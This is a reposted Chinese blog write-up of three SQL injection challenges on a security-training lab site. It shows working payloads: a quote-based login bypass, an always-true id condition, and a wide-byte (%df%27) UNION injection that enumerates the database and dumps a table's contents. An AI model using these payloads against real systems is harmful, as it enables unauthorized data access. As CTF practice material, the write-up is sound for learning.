我是靠谱客的博主 优雅冥王星,最近开发中收集的这篇文章主要介绍网安实验室CTF 注入篇,觉得挺不错的,现在分享给大家,希望可以做个参考。

概述

1.最简单的SQL注入
地址:http://lab1.xseclab.com/sqli2_3265b4852c13383560327d1c31550b60/index.php
这里写图片描述

用户名输入 admin’ or ‘1’=’1 实现绕过。

2.最简单的SQL注入(熟悉注入环境)
地址:http://lab1.xseclab.com/sqli3_6590b07a0a39c8c27932b92b0e151456/index.php

页面没有输入框,查看源码,发现tips:id=1
说明 url?id=1处存在注入点。添加‘ 报错,于是考虑构造
?id=1 or 1=1永真语句
成功注入拿到flag

3.防注入
地址http://lab1.xseclab.com/sqli4_9b5a929e00e122784e44eddf2b6aa1a0/index.php
同样的发现id=1处存在注入点。这里同样考虑构造or 1=1
发现无法注入。
抓包查看响应头,发现是gb2313编码。考虑可能是宽字节注入(这里是看了别人的博客)
这里写图片描述
输入%df%27 报错。
%df%27%20and%201=1%23 返回正常。
%df%27 order by 3%23 返回正常 即字段长度为3
%df%27%20union%20select%201,2,3%23 返回2,3
%df%27%20union%20select%201,2,database()%23
爆出:
2
数据库名:mydbs

%df%27 and 1=2 union select 1,group_concat(schema_name),3 from information_schema.schemata%23
爆出:
information_schema,mydbs,test
3
mydbs 转换成十六进制为0x6D79646273

%df%27 and 1=2 union select 1,2,group_concat(table_name) from information_schema.tables where table_schema=0x6D79646273%23
爆出:
2
sae_user_sqli4

sae_user_sqli4转换成十六进制为0x7361655F757365725F73716C6934

%df%27 and 1=2 union select 1,group_concat(column_name),3 from information_schema.columns where table_name=0x7361655F757365725F73716C6934%23
爆出:
id,title_1,content_1
3
猜测flag值在content_1内

%df%27 and 1=2 union select 1,group_concat(content_1,0x3b),3 from sae_user_sqli4%23
爆出:
my blog test;,easy ;,flag值手动打码= =;,flag is here!;
3

最后

以上就是优雅冥王星为你收集整理的网安实验室CTF 注入篇的全部内容,希望文章能够帮你解决网安实验室CTF 注入篇所遇到的程序开发问题。

如果觉得靠谱客网站的内容还不错,欢迎将靠谱客网站推荐给程序员好友。

本图文内容来源于网友提供,作为学习参考使用,或来自网络收集整理,版权属于原作者所有。
点赞(35)

评论列表共有 0 条评论

立即
投稿
返回
顶部